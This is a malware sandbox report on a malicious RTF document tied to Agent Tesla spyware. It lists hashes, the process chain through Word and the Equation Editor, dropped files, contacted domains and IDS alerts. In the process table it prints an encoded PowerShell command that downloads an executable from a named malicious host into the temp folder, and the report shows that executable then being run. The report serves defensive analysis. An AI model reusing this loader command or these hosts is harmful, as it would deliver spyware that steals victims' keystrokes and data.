File name: | vsl Q88.doc |
Full analysis: | https://app.any.run/tasks/7b38b565-63d5-45fd-af01-fc75b22d2e21 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | May 24, 2019, 08:19:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 8E5E1EC8164F6771A6AFF818827B572F |
SHA1: | F6C85E6349C93ADE09D59A186DA76EB91A36AB5B |
SHA256: | 12815736405039F9F38555B049B598ECEDE58402DAA36957EFBB89B899583B06 |
SSDEEP: | 48:acSSebGDvTzDXi5xokbzjEsTl0en2HwDEEEEEEEEEEk:acSSCGDvrSxJFx92sEEEEEEEEEEk |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\vsl Q88.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2948 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3196 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAHMAZQBsAHYAZQBsAG8AbgBlAC4AYwBvAG0ALwBhAHIAaQAuAGUAeABlACIALAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAbgB2AGIAYQBjAGsAZQBuAGQALgBlAHgAZQAiACkAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2336 | cmd /c %temp%\nvbackend.exe | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3356 | C:\Users\admin\AppData\Local\Temp\nvbackend.exe | C:\Users\admin\AppData\Local\Temp\nvbackend.exe | cmd.exe | |
User: admin Company: Blazevideo Integrity Level: MEDIUM Description: Quantum V11 Affecting Drenched Version: 5.7.7.512 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA01.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3196 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MUZ2H3EM3VT11VF0Q85Q.temp | — | |
MD5:— | SHA256:— | |||
2948 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:D7DACFC9FDC074AB677F28FF29A15A3F | SHA256:F10FA0328BB7C8C55A2E85AA61EA37C80CA5FB160BA8BE07DC748F8334F000FD | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$l Q88.doc.rtf | pgc | |
MD5:4C40AC9A9719EF6DCE72B0F674C8CE9B | SHA256:ADAAC9C7BBD045C67363E5D35F7FBEA2EBD1A8BDA610B04EEBB05F62188B247D | |||
3196 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14f422.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3196 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
2948 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\d9zTXwNB[1].txt | html | |
MD5:7CAE44F7A56192176C5B4B894899A51F | SHA256:773BE4D4CE215D0A1B290A8CE18DD68726A859AB873C56BA7A777D7591253B7D | |||
3356 | nvbackend.exe | C:\Users\admin\AppData\Local\Temp\636942864564790000_8c34e72f-1c03-4670-a4b3-605bf3c79887.db | sqlite | |
MD5:0B3C43342CE2A99318AA0FE9E531C57B | SHA256:0CCB4915E00390685621DA3D75EBFD5EDADC94155A79C66415A7F4E9763D71B8 | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:18C5114A0FFF303169E0B23B683E12F1 | SHA256:9E0A038E4163A6528AD78FBDA4DD0274736EBE00B838067B9AB42421E2AB6133 | |||
3196 | powershell.exe | C:\Users\admin\AppData\Local\Temp\nvbackend.exe | executable | |
MD5:841B3295073BAA708EEB549FBB7EB92C | SHA256:962E97C67B8F8D6827A1A2A40083DD46B1F1C5FFA75F5B1BD7838A4F755CEA89 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3196 | powershell.exe | GET | 200 | 144.208.72.242:80 | http://selvelone.com/ari.exe | US | executable | 1.08 Mb | suspicious |
3356 | nvbackend.exe | GET | 200 | 52.200.125.74:80 | http://checkip.amazonaws.com/ | US | text | 12 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2948 | EQNEDT32.EXE | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3356 | nvbackend.exe | 174.136.57.160:587 | mail.mazshipping.com | Colo4, LLC | US | malicious |
3356 | nvbackend.exe | 52.200.125.74:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared |
3196 | powershell.exe | 144.208.72.242:80 | selvelone.com | InMotion Hosting, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
selvelone.com |
| suspicious |
mail.mazshipping.com |
| malicious |
checkip.amazonaws.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3196 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
3196 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3196 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3356 | nvbackend.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3356 | nvbackend.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |